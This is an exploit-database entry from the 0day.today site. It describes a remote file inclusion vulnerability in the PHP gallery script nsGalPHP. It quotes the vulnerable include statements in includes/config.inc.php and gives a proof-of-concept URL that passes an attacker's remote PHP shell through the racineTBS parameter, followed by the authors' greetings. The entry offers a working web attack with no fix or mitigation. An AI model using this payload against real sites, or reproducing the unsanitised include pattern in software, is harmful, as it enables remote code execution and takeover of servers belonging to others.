[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

nsGalPHP (includes/config.inc.php racineTBS) Remote Inclusion Vuln

Author
S.W.A.T.
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1430
Category
web applications
Date add
27-01-2007
Platform
unsorted
==================================================================
nsGalPHP (includes/config.inc.php racineTBS) Remote Inclusion Vuln
==================================================================



                  _________________________________
          ________|                                 |________
          \       |              S.W.A.T.           |       /
           \      |                                 |      /
           /      |_________________________________|      \
          /___________)                         (___________\
    ------------------------------------------------------------------------------------------------------------------------
    Script:nsGalPHP
    Affected Version:unknown
    ------------------------------------------------------------------------------------------------------------------------
    Author:S.W.A.T.
    ------------------------------------------------------------------------------------------------------------------------
    Bug in (includes/config.inc.php)
    Vul Code;
    include_once($racineTBS.'includes/tbs_class.php');
    include_once($racineTBS.'includes/fonctions.inc.php');
    require($racineTBS.'lang/'.$config['langueDefaut'].'.php');
    ------------------------------------------------------------------------------------------------------------------------
    POC:
    http://[target]/[path]/includes/config.inc.php?racineTBS=[PHPSHELL]
    ------------------------------------------------------------------------------------------------------------------------
    Thx: koray-Timq-r0ut3r-nuffsaid-All My Friends
    Special Greetz:All Member Of XmorsTEAM
    ------------------------------------------------------------------------------------------------------------------------


#  0day.today [2024-11-15]  #